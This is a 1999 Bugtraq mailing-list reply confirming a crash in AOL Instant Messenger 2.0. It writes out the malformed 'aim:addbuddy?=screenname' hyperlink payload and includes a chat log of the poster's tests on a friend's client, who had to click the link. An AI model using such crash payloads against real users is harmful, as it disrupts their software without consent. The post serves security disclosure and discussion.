Bugtraq mailing list archives
Re: AOL Instant Messenger URL Crash
From: djr () NARNIA N ML ORG (Daniel Reed)
Date: Tue, 20 Apr 1999 16:24:02 -0400
On Mon, 19 Apr 1999, Adam Brown wrote: ) There is a bug in the newer versions of AOL's Instant Messenger that will ) cause the client to crash when exploited. All builds of version 2.0 that ) I've tested seem to be vulnerable, although I have not done extensive ) version testing. AOL was notified of this about two weeks ago. To exploit ) this bug, send a hyperlink in this format: aim:addbuddy?=screenname I just sent <a href="aim:addbuddy?=screenname">what does this show up as</a>? to an AOL AIM 2.0.996 user and once she *clicked* on it AIM crashed. I don't know if you meant to say that the user had to click on it for the client to crash, or if this is indeed different behaviour. I also just tried it with "screenname" replaced with first her screenname, and then with mine, again with no automatic reaction. (sent from linuxkitty, a naim-0.9.4-parse2 user, to <victim>, an AOL AIM 2.0.996 user) [15:59:43] linuxkitty: [LINK:href="aim:addbuddy?=screenname":what does this show up as]? [16:00:23] Friend <victim> has just logged off :( [16:03:09] Friend <victim> is now online =) [16:14:14] linuxkitty: [LINK:href="aim:addbuddy?=<victim>":miaow miaow] (don't click on that, I'm just testing something) [16:14:50] linuxkitty: [LINK:href="aim:addbuddy?=linuxkitty":anoth er test...] -- Daniel Reed <n () ml org> Many a false step is made by standing still...
Current thread:
- Re: bug in ssh allowing to be invissible, (continued)
- Re: bug in ssh allowing to be invissible Joe Gross (Apr 20)
- NetBSD Security Advisory 1999-009 matthew green (Apr 20)
- Bash Bug Shadow (Apr 20)
- Re: Bash Bug Marc Lehmann (Apr 21)
- Re: Bash Bug Pavel Kankovsky (Apr 22)
- Re: Bash Bug Chet Ramey (Apr 22)
- L0pht Security Advisory: Cold Fusion App Server Weld Pond (Apr 21)
- Re: Plain text passwords--necessary Densin Roy. (Apr 19)
- Re: Plain text passwords--necessary Daniel Alex Finkelstein (Apr 19)
- AOL Instant Messenger URL Crash Adam Brown (Apr 19)
- Re: AOL Instant Messenger URL Crash Daniel Reed (Apr 20)
- Shopping Carts exposing CC data Joe (Apr 19)
- Re: Shopping Carts exposing CC data Joe (Apr 20)
- Outlook 98 allows spoofing internal users Nate Lawson (Apr 20)
- Re: Outlook 98 allows spoofing internal users Peter van Dijk (Apr 25)
- Re: Shopping Carts exposing CC data Louis R. Marascio (Apr 20)
- eBay password stealing with JavaScript Michael K. Sanders (Apr 20)
- Re: eBay password stealing with JavaScript Paul Festa (Apr 21)
- Bug in Linux Mount Jacek Konieczny (Apr 20)
- Re: Bug in Linux Mount Meelis Roos (Apr 20)